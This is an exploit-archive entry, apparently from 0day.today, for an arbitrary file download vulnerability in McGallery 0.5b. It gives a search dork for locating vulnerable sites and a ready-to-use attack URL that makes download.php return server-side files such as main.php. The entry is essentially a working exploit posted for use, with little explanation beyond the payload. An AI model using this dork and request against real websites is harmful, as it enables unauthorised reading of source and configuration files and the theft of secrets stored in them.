id: 1598
date: 03/15/2007
title: McGallery 0.5b (download.php) Arbitrary File Download Vulnerability
author: Piker
cves: 

===================================================================
McGallery 0.5b (download.php) Arbitrary File Download Vulnerability
===================================================================




################## Piker #######################################
#
#
#    McGallery 0.5b Arbitrary File Download Vulnerability
#
#
#    Affected software: McGallery 0.5b
#    Vendor: http://sourceforge.net/projects/mcgallery/
#    Dork: allintitle: "MCgallery 0.5b"
#
################################################################
#
#    http://[target]/[path]/download.php?filename=main.php
#
################################################################
#
#                   Found by Piker
#                   The Am0s Team
#
#    Greetz: KX-T33, kakalake, nAzGuL, Putus, sn4ke
#
################################################################



#  0day.today [2023-03-27]  #